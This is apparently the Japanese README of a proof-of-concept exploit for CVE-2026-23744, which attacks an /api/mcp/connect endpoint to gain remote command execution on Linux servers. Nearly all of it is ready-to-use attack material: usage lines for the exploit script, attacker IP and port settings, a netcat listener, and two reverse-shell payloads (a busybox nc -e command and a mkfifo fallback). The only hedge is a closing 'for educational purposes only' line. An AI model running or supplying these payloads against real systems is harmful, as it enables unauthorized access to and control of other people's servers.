
CVE-2026-23744の概念実証エクスプロイト。Linuxシステム上でリバースシェルを介したリモートコマンド実行を実現するため、/api/mcp/connectを標的とします。
/api/mcp/connect を悪用してリモートコマンド実行を行うPoCです。
pip install requests
python3 exploit.py <ターゲット>
例:
python3 exploit.py mcp.something.com
attacker_ip = "YOUR_IP"
port = 4444
nc -lvnp 4444
デフォルト:
busybox nc <IP> <PORT> -e /bin/sh
フォールバック:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc <IP> <PORT> > /tmp/f
-e が失敗した場合はフォールバックを使用する教育目的のみで使用してください。